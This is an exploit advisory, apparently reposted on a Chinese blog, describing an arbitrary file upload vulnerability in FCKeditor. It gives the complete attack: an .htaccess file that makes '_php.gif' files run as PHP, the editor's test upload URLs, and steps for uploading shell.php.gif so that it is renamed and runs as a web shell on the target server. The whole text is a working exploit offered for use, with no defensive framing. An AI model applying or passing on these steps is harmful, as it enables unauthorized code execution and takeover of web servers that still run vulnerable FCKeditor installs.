FCKeditor all version File Upload

/ 0评 / 0
In The Name Of GOD
 [+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
 [+] Date: 2011
 [+] script:http://sourceforge.net/projects/fckeditor/
 [+] Author : pentesters.ir
 [+] Website : WwW.PenTesters.IR
 ———————————————————
 1.create a htaccess file:
 code:
 <FilesMatch “_php.gif”>
 SetHandler application/x-httpd-php
 </FilesMatch>

 2.Now upload this htaccess with FCKeditor.

 http://target.com/FCKeditor/editor/filemanager/upload/test.html

 http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

 &mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-
 3.Now upload shell.php.gif with FCKeditor.
 4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
 5.http://target.com/anything/shell_php.gif
 6.Now shell is available from server.
 &mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;

来自:A8

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注